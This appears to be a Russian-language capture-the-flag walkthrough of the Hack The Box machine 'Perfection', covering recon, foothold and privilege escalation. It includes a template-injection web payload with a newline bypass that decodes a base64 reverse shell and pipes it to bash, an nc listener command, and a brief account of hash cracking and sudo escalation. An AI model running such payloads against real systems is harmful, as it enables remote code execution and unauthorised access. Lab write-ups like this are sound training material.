Автор: @FaLLenSkiLL
Ссылка на тачку HTB:
https://app.hackthebox.com/machines/Perfection
Разведка
Сканим порты. Видим только SSH и вебчик
nmap 10.10.11.253 -p 22,80 -sC -sV
Для удобства можно заходить по доменному имени
echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts
Заходим на 80 порт
User flag
Заходим на http://10.10.11.253/weighted-grade-calc
Генерируем reverseshell
Кодируем его в base64
Добавляем bypass и, в итоге, получаем такую полезную нагрузку, где CHANGEME это ваш закодированый reverseshell
category1=a///A77ss/e%0A;<%25%3d+system("echo CHANGEMECHANGEMECHANGEME | base64 -d | bash")+%25>+&grade1=2&weight1=20&category2=bc&grade2=2&weight2=20&category3=de&grade3=2&weight3=20&category4=fh&grade4=2&weight4=20&category5=sd&grade5=2&weight5=20
Запускаем прослушиватель
nc -nlvp 9001
Отправляем запрос
Ловим shell
Лутаем пользовательский флаг
Root flag
Побегав по тачке, находим креды пользователей
И подсказку, как генерируются пароли
Составляем маску и брутим хеш
Теперь, зная пароль, можно прописать
sudo su
И залутать флаг
Tags: